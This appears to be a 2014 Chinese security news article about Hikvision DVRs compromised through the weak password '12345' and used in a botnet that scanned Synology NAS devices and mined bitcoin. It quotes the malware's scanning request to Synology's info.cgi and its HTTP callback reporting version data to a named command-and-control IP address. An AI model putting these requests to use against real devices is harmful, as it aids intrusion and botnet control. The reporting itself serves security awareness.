主站

分类

漏洞 工具 极客 web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据库安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

海康威视录像机(DVR)被用于发动网络攻击和比特币挖矿 金币
2014-04-02 10:59:50

上周安全人员通过一份报告得知,海康威视(Hikvision)的数字录像机(DVR)扫描了他们设立的蜜罐,这些数字录像机原本是用于储存安全探头的视频,但由于弱密码(12345)而被感染了病毒,变成了僵尸网络的一部分。其被用于扫描存在漏洞的台湾群晖磁盘站(Synology Disk Stations)。此外,数字录像机还被安装了比特币挖矿程序。

值得注意的是,录像机感染的病毒是ARM二进制程序,显然病毒是专门针对ARM设备而不是x86 Linux服务器。

恶意病毒发出的HTTP请求

GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

然后病毒会传送版本信息至162.219.57.8

GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close

原文信息

本文作者:, 转载请注明来自FreeBuf.COM

# 僵尸网络 # 海康威视漏洞
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦